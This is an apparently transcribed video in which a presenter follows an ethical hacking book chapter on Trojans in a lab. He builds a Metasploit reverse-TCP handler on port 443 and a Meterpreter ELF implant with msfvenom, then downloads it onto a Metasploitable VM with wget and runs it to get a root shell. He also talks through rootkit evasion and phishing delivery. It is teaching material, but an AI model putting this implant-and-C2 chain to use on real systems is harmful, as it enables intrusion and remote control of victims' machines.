Thank you for watching HackTheFile. I'm Michael Lopez, and on today's episode, we're going to be doing Chapter 10 of the Ethical Hacking book series, Building Trojans. Enjoy. All right, so this is the chapter that I think that I've been waiting for. Gets more involved in setting up a hacking server and building a Trojan and a payload and stuff like that. So, kind of excited about this one. Um, let's get started and start doing this. I'm just starting up my machines, and this one might be a kind of a long one, but this one is interesting, so you're gonna want to follow along, um, and whatnot. So this one's gonna be broken up into a couple different videos since this is a long chapter. All right, building Trojans. Things are not always what they seem. The first appearance deceives many. The intelligence of a few perceive what has been carefully hidden. Phaedrus? Consider the following scenario. An attacker pretending to be head of IT sends an email to an employee. The email tells the victim to download the updated version of Alpine email client. But unbeknownst to the victim, the attacker has embedded an implant in the program. When the victim installs the client, the installer will install the implant too. All ethical hackers should understand the mechanisms of implants like these. Implants concealed within legitimate files are called Trojans. I'll begin by discussing the Drovorub malware implant, developed by Russian military intelligence GRU, and recreate its general design using Metasploit. The implant, which was designed for Linux systems, provides a great case study on modern malware. In this chapter, you'll learn how to hide an implant in another file and obfuscate it to avoid detection using tools like MSF Venom. You'll also get some practice writing custom Metasploit modules by creating an encoder that can help your implant evade antivirus software. So this one we'll probably do in the next video. After exploring implants for Linux and Windows systems, I'll also show you how to generate malicious implants for Android devices that can listen to a phone's microphone, take pictures with phone cameras, find the phone's location read and send text messages, and download the phone's call log. In this chapter's exercise, you'll build an implant that can steal a victim's password by logging their keystrokes. We're gonna make a logging keystroke logger and take their picture by accessing their camera. Oh, that's pretty cool. Case study: recreating Drovorub by using Metasploit. In 2020, the NSA released a report analyzing Drovorub. This section discusses the architecture of the implant, shown in Figure 10.1, and describes how you can build something similar using open source tools like Meterpreter. Figure 10.1, the architecture of the Drovorub implant described by NSA report. So here's your hacker, agent, server, internet, client, victim, and you need to get their kernel. Sending it back to the hacker database. Drovorub consists of four key parts: the attacker's server, the attacker's agent, the malware client, probably the database right here. And the malware kernel module. Oh, client, and then the kernel module. Once an attacker has compromised a victim's machine, they install the malware client and malware kernel module. The kernel module helps to implant avoid. The kernel module helps the implant avoid detection by overriding the operating system's malware detection function. In a way, this is like pasting a picture of a room over a security camera. The malware client communicates with the attacker's server, which manages connections from multiple machines and stores information on each connection in a central database, and allows the attacker to control the victim's machine. You can construct something similar to the Drover Rub implant using open source tools. We'll do so here using the Metasploit framework, an open source collection of software libraries, hacker tools, and exploit code. The ethical hacking community regularly contributes to Metasploit, so it's a great tool to have in your ethical hacking toolbox. Building the attacker's server. Let's begin by setting up the attacker server, also called the command and control server, which will accept connections from implants installed on victims' devices. The Metasploit framework allows you to host such a server on an independent machine, but will host it directly on our Kali Linux virtual machine. Run the following command to get the machine's IP address. ifconfig etho. Okay, let's run that one, right? Alright, let's see. Write down this address, you'll need it later. Next, you'll need to start a PostgreSQL server, which comes pre-installed on Kali Linux. PostgreSQL is the database that will store implant connection metadata. Sudo service PostgreSQL start. All right, let's run that one. So sudo service. We're gonna minimize that one since we're gonna need it later. Is it sudo service? Sudo service. PostgreSQL. Start, man. Start. Now that the server is running, let's start MSF console, which allows you to access the feature of Metasploit framework. Metasploit should be pre-installed on Kali Linux, so you shouldn't have to install it yourself. Start MSF console by opening a terminal and running the following command: sudo msf console q. So let's go ahead and we're gonna put this in my hackers hack the file, right? So what we're gonna do is we're gonna come here, create a new folder, and I'm gonna call this attacker server. Oh, can't spell. Attacker server. Come in here, we're gonna create a document, we're gonna put instructions. Open this. I'm gonna save. Run. I'm just putting this in here because it was in the book. Okay, and then we're gonna do sudo service PostgreSQL start. This starts your um, SQL server. Okay, that's as far as we've gotten already, but I'm gonna do sudo all right. Let's sudo msf console -q. Now let's okay. The console will take some time to boot up. After it has started, run the following command to begin the server setup process. Use exploit slash multi handler. Okay, there it is. It's running. Oh man, I can't spell. I always put an S in exploit. I don't know why. All right, let's put that in my. Exploit multi handler. This command allows you to select modules in the Metasploit framework. I'm going to minimize this. Modules are pieces of software that perform specific tasks. We'll use the handler modules in the exploit multi folder to create the hacker's server. These module functions these modules function like the TCP server we developed in chapter 4. They will listen for connections from clients. Once you've selected the modules, use the set command to assign them context specific values. Start by setting the type of implants for which the server should listen. Metasploit has several implant types for Windows, Linux, iOS, and Android systems. We'll be attacking a Linux system, so we'll listen for Linux x86 implants. Run the following command to set the type. So let's go ahead and put that in there. We're going to set payload. I think this one is, what do you call it? You have to get it. You have to type it in exactly. I don't know. I don't remember. Interpreter. So I set my payload Linux X3, x86 interpreter reverse TCP. Let's go ahead and pop that in my hold up. Implant type Pick the implant type. Okay. All right. Oh, it's right there. Okay. The The payload flag specifies the type of implant to listen for. Fun fact, the term payload has its origins in military terminology, where it is often used when referring to the context of a bomb. Next, set the server's IP address by passing it to your Kali Linux machine's IP. Set L host and then the IP address. L host stands for listening host. Now let's set the listening port. So let's do the listening. Let's set that. Set L host Kelly's IP. Set L host. And these have to be capitalized. The IP address is right here. L host is set. Oh shoot. Let's go into my this sets the host IP address. Okay. L host stands for listening host. Now set the listening port. We're gonna set port 443. So set L port 443. Set L port 443. This one's gonna set. Okay. We'll choose port 443 because it is associated with the HTTPS protocol. It makes the network traffic appear less suspicious. Some implants even communicate over the DNS protocol to avoid raising suspicion. Run the following command to start the server you've configured. Exploit. Okay, let's exploit that. Started reverse TCP handler my on my Kali box port 443. So now let's go back to this and say all right, let's see what else says. So all that worked. Let's back here. The exploit command runs the module. If you've successfully started the server, you should see the following output: started reverse TCP handler on Kali IP address 443. That's exactly what we saw. Leave this terminal open so that the server will continue to run. Building the victim client. Now let's create the implant that will install on the victim's machine. Create a new folder on your Kali Linux desktop called malware. Make directory desktop malware. Now we're gonna practice this. Eh, let's see. Yeah, we're gonna leave that right there. Open a new one. I'm gonna say make directory des oh, where do you want to make the desktop? Desktop malware with the capitals. Okay. O'Reilly. Boom. Okay, so we're gonna practice that because you have to know how to do that. If you do it over and over again, it's fine. Yeah, that or I just could have created one here because I could have just said um, created folder, but that's fine. Okay, open a new terminal and run the following command and navigate to the folder. So cd. Oh, all right, we're gonna do it exactly like that then, because I need to practice. So we'll do that. CD, just little home. So now I'm in that directory because it says desktop malware. This little squiggly line, if you guys don't know already, that's your home, right? So that's what that is. But I'm sure you guys already know all that. Okay, so now, and if you don't know, now you know. So now we'll go here. Okay, now we're there. I already put this in there, right? Yeah. Building the victim client. We don't have to put this in there. We'll use the MS Venom tool to create the malicious implant. Run the following command to do so. Desktop malware. sudo msf venom. Okay, so this is showing that I'm already in there in the desktop malware, right? Um, so I just need to type this sudo ms venom. So let's go ahead and do that. And then if it works, then I'll put it in my little book under I'm in my folder under victim client, building victim client or victim clients. So let's open this back up. I'm gonna move this. If you guys should pause it. If you guys want to follow along, pause it before I move this, and then you guys can follow along. So sudo. Oh, yeah. Okay, so sudo. Where the heck is it at? MSF Venom. MSF Venom. It's AX86 platform Linux minus P Linux slash 8x86 meter reverse TCP uh, L host equals the address port equals 443. Smallest I 4 F elf output malicious. Did you just call me uh something and delicious? I can't remember what he says. Delicious. All right, let's see if that works. No encoder specified. Outputting raw payload. Payload size 120 bytes. Final size elf file. 207 bytes. Saved as malicious. You call me delicious. Okay. So now what we're gonna do is we're gonna come in here and I'm gonna copy all this. See if that works. Come in here and I'm gonna go to hack the file. Actually, I'm sure there's a malicious in there now. So what I'm gonna do is I'm just gonna take this file, put it in here later under malware, because what did I put in here? Nothing, right? ARP detector, attacker server. This is just the attacker server. So we'll do that later. Man, this window is just mad sun in my eyes. All right, let's read this. The A flag represents the architecture being targeted. In this case, it's x86. The platform flag specifies the target platform, Linux, and the minus P flag specifies the payload type, Linux. In this case, a reverse TCP shell like the one we implemented in Chapter 4. So Linux reverse TCP host interpreter. The smallest flag, this one, generates the smallest possible payload. The minus I flag here helps us avoid antivirus detection. Oh, that's interesting. And I'll discuss it more later. The minus F flag, well, the 4 has something to do with it, represents the file we need to output. A minus F. We choose ELF because it's used by Linux executables. The execute format is used by Windows executables. Oh. The O flag right there specifies the name of the output file. Malicious. Okay, so what did we just set up? We'll use MS Venom tool to create the malicious implant. Okay, so that's a malicious implant. We used MS Venom to do that. That's awesome. Uploading the implant. So let's go ahead and do this. Look. Oh, crap. Let's see what we got here. Okay, so building the victim implant. So, just bear with me. There you go. And I highly recommend you guys do this too. Um, what's going to happen is you're going to forget the steps at the very least, right? So the reason why I do this, because it's not because I'm stupid, okay, or anything like that. What's happening is through repetition, I'm gonna remember most of this stuff, right? More and more and more and more repetition. But since we're not doing that much repetition, we're just running through this book. For me to remember is I can go back here and I can reference the step by steps and go, oh, okay, that's right. And I don't have to go back to the book. I don't have to do anything. I've got it all in my own instructions. And then I remember everything else for the most part while I'm running through this. So, so in this case, yeah, I need to do that through here. So, right, that's not the right instructions. So, we'll go here, tag server, malware instructions. Then I'll say run. It's not gonna let me do it. Oh yeah. And I've got the command in here and everything, so this will that does uses MS Venom uh, tool to create malicious implant. It's MS Venom. MS Venom to create malicious implant will do is sudo emission venom. I'm just gonna leave this like this, okay? Because common sense will tell you that this is gonna be like the, you know, specifically for Linux and stuff and port 443. This is after you. This should go in conjunction with what I just set up in this with the server. So this is fine. So I can save that. I'm not gonna put anything, customize it or put in here IP address of host and all that like I usually do. I'm just gonna leave it like that. I can extrapolate from there, right? So close that. Open this back up. All right, already read that. Okay, uploading the implant. So far we've set up the server. Okay. Um, the SQL database, the payload, and the malicious implant, right? Or whatever. Uploading the implant. Okay. We'll deliver the implant the same way we delivered the reverse shell in chapter 4 by downloading it onto the victim's machine. Start a Python server inside the malware folder by running the following command. All right, we're going to start that Python server inside the malware folder. So that's here. And what I'm going to do is I'm going to move this over here, even though, damn it. So now there's an easier way to do this, but we're going to all do this from the same command line. Okay? Because we need to practice this. So we're going to go to CD home. Can't spell. Can't type. Okay, now I'm in the malware. Oh man, that's not the. Is that where we're supposed to be? Okay, wait, hold on. What am I doing? Uploading it. Okay. So now we're in the malware file, and we're gonna open up a server there. So, sudo python 3 m http dot server. I've done that. Oh crap! What the fudge is going on here? Whack. Sudo. I guess I should be trying to actually type. Oh, that's what's happening here. Let's go to new folder. Create document. Sudo Python 3 minus m http dot server port. Okay. Now that's listening. And we got our other server listening. In previous chapters, we looked at several ways to gain access to a system. For simplicity, instead of using the back door like we did before, we'll assume that a hacker has stolen credentials for the system. Start up the Metasploitable server and log in using the username msadmin, password msadmin, msfadmin. Then we'll use the utility wget to download the implant. So this one is skipping the whole backdoor hacking process, but we did that in this book in previous chapters. So you're gonna have to go back and find it if this is gonna be your first introduction to this series or whatnot. Go back to the other series, and I'm also gonna create after I finish this book, I'm gonna create a podcast of it. We'll have all the videos associated with it, so you can find them all easily. But right now, I'm gonna wait till I finish the book. But basically, they used a vulnerability in the Metasploitable whatever and used a backdoor in it. Okay, so this one you're gonna have to, we're gonna assume that you've hacked the system somehow. Like you've used the back door, you got a hold of his credentials, you broke into somebody's office and they had post-it notes of their username and password in there, or whatever. Okay, so either however you did it, it's gonna assume you did it already, which is fine because we've already done other things, right? So we're gonna go to the Metasploitable and we're gonna log in like it said. So and it's always MSF admin on this Metasploitable server. Okay, then use the utility wget to download the implant. So we're gonna download the implant. We're gonna use wget. And if you want to pause it, you can follow along. I'm gonna move it over and I'm gonna make this bigger so you can see. And it doesn't matter. Okay, I'm gonna go wget and the Kali Linux port. This one. Go back here. I'm gonna copy selection. Go back down. Which one of these is the? Oh, I'm in the MS Metasploitable. I hate this. Alright, I'm gonna have to do this off screen real quick because I can't see the. This is fun though. Okay, so now, okay. Oh, I didn't get that. I don't know why. What I'm doing, I did that wrong. So basically, we're simulating the payload being downloaded onto the server, and however you get that in there, you're gonna have to use a reverse shell or something. Let me do this again because I did it wrong. Wget. Hell's my numlock? Port 80 slash. Man, I can't spell. MALICIOUS. Okay, got it. Let me show you what that looks like real quick. Got him. Okay, so got him to my my Metasploitable. Now, if this is your first video following this series, you're gonna have to go back to the setup of this network, this virtual network. Okay, to do all this stuff. If not, and you already have this set up, then you can follow along. If not, just watch what I'm doing. You can do it in school. You can do it here. I'm gonna have another um, series that's gonna set up multiple virtual machines. So I'm gonna have different networks, little virtual environments, and I'm gonna set those up and show you guys how to do them step by step from the books. Because a lot of these books show you how to set them up really well, and they set them up all the same. They go to everybody goes to the same websites and everything. So um, I'm gonna start another series doing that. But for now, if you don't have one of these Metasploitables set up, you can Google it and set one up. But um, the way these are all connected into my network and into the net and this virtual network is explained in the book. So you're gonna probably have to go back and watch those videos, some of the first videos, right? Um, so this right here connected, and they went and got my malicious implant, right? So now it's on my box. The implant's on my box now, on this Metasploitable box because that W got it right. Make the implant executable plus X by running the following command. So MSF admin Metasploitable. This is, I'm just showing that I'm still on my Metasploitable. So I'm gonna change it to me you be able to run it, right? So I'm gonna go here, show this, and I'm gonna just type in that command. Sudo change mod plus X malicious. It's asking me for the MSN admin. Hopefully that worked. Run the malicious program by executing the following command. So sudo dot backslash malicious and no such file directory. The AND option runs a process in the background. Open the Kali terminal, running the hacker server. If the implant was successfully connected, you should see the following. Let's see. I don't know if that. It says no such file or directory. I spelled it wrong or what? Man. MALICIOUS. Waiting response. Okay. Downloaded. Malicious saved. MALICIOUS. What the fudge is going on here? Sudo MALICIOUS. Malicious. Sudo malicious and sudo malicious no such file directory. That's like weird. It's malicious right there. Let's see if it says no such file, but let's see if that ran. Let's see what. Yeah, it's doing something. Oh, this is the Python malicious HTTP1. Started with yeah, it's not. Okay, it has done nothing. It's because it didn't run. Because it's looking for those. That that didn't work. Okay, let's see why it didn't work. Okay, now that's looks like it's running. So the problem with this book, right? If that worked now, is yeah, there you go. So it listened, right? And it's listening for this specific um implant, remember? Sending message, Trevor session when opened. So now the payload. Now I'm in, I think, right? Or what? So problem with this book is sometimes, and with all these books I've noticed, is this is you got to know how to put a your pseudo space dot backslash malicious, right? I mean that's just common sense. And when you run a lot of programs, you have to put a space and all that. The space means something, whatever. So now in the book, it doesn't show a space there, right? So a lot of people are gonna type this in and get stuck, right? They're gonna write sudo. It's not working. It's not working. It's not working. And I forgot to put and to run that in the background. But anyways, um, and that's the problem with a lot of these books. Even all these commands, right? A lot of them aren't spaced like this. You can't really tell that there's spaces between that, right? You got to actually know how to use Linux, like right here too. There's really no space there. So somebody's gonna type in MS Venom and probably put this whole thing together. And sometimes it matters, sometimes it doesn't, but most of the time it does, right? And they're not gonna put no space here. They might do this as one whole thing. So you got to pay attention. That's why I like my videos, because somebody gets stuck and they see me type this out. Trust me, when I first started using Linux, I was in hell, because I was, just trying to figure out, why isn't none of this working? Where do I put the spaces? Why does it need a space here, not here? What's going on? And it took me forever. I would say like a whole year of just, typing in stuff, typing and realizing how it all works and where spaces should naturally be when you're typing these commands. So trust me, you're not alone if you're struggling through that. That's everybody struggles through it. And here's one example of it. There's no space right there, right? There should be. It should be sudo space dot backslash malicious and, right? Because I ran it like this and it didn't work. Okay, so open the terminal, running the hacker server. If the implant was successfully connected, you should see the output like this. All right, let's see if that matches what it's supposed to be. So here it is. Yeah, so run server session opened. Let's see the same thing. Opened. Yep. All right, and then Medterpreter. Congratulations, you've just installed your first open source malware implant. Yes, it really is that easy. Now let's interact with the implant using the attacker's agent. So we don't need to do this part, because this part is not going to be useful for me if I ever have to hack something, right? Other than setting up this server to listen to wget commands. We already know how to use wget. Um, you know, this stuff here is assuming that we're on the attacker server, and then we can, if we have admin rights, we can change and all this. But with this is, I don't need to have this on there. The option to run, okay, the and option runs the process in the background. Open Kali terminal on the hacker server. If the implant server, you should see it output like this. Oh no, this is the last command. Okay, we're not gonna type in exploit. It's just talking about this. Okay, that confused me. I was gonna type that in. Okay, using the attacker agent. So this is a long video. We might stop here and break this up into different videos. Using the attacker agent. Okay, let's see though. This agent supports a variety of commands that allow you to interact with the implant. For example, you could list all the files on the machine using the ls command. Here, the interpreter interface represents the hacker agent. So I could type ls, which I guess let's do that. So come in here and go to Kali. So now I'm hooked in here, and I can say, okay, I'm into this guy's system. I'm gonna list all the files. See, so here's all your files. My malicious is in there. Vulnerable's in there. I put in there a while ago. Okay. You can download or edit any of these files using the download and edit commands, and you can list all available commands by running the help commands. We can run the help command, tells us how to do everything. You can gain access to the victim's shell by running the shell command. I can run a shell. Try interacting with the shell by running the command who am I. When you're done, type exit to return to the interpreter interface. So we can put shell and then say who am I. Let's go back here. Man. Let's say who am I? Root. They said type exit. Exit. Now I'm back to the interpreter. Um, why we need a victim's kernel module? If a system administrator on our Metasploiter machine views the running process with the following command, the malicious program will show the following. If a system administrator on our Metasploiter machine views the running process, right, with the following command, the malicious program will show the following. PSAU. The PS command lists all processes for all users. This command is equivalent to the task manager in Windows. As you can see, the malicious program shows up. One. Right there. How do hackers avoid detection? They do so using a rootkit, software that provides the implant access to functionality of the operating system's kernel, which is the highest possible access. The implant can use this access to make itself virtually undetectable. For instance, Interpreter will attempt to evade detection by pretending to be another process on Windows. You can use Interpreter's migrate command to hide your malicious process inside another process. We discussed this process of hiding in detail in Chapter 11. So I'm not going to run this command. The PSAU command just runs the process for all the users, right? And they're like, what the hell? The heck is malicious? And they'll shut it down, right? Take it out, wipe it out. Hiding an implant in a legitimate file. Attackers can often use social engineering techniques to get an implant onto a victim's machine. For example, they might send a victim a phishing email, which is the number one way that hackers hack a system, that encourages them to download a Trojan, a program that carefully hides a malicious implant inside another program. The term Trojan comes from the Trojan Wars, during which, legend has it, the Greeks gained access to the city of Troy by hiding in a large statue of a horse called the Trojan horse. We'll execute a similar attack here by sending a phishing email encouraging a victim to download an updated version of the company's email client, Alpine, from a fake site. Hold up. We'll execute a similar attack here by sending a phishing email encouraging a victim to download an updated version of the company's email client, Alpine, from a fake site. You'll execute this attack on the Ubuntu desktop machine in your virtual environment. Let's begin by creating the Trojan. So, we're going to stop there. Because it's getting exciting. And I want you guys to come back and see the next video. But, this has been a long video anyway. So, we're going to stop it here. I'm going to have to redo all that crap, or maybe I don't. And then we're going to walk through this next, creating the Trojan and finishing up the chapter. So I hope you had fun. I know I did, and we did a lot. So that's it for this video, and I'll see you on the next Hack the File. Have fun.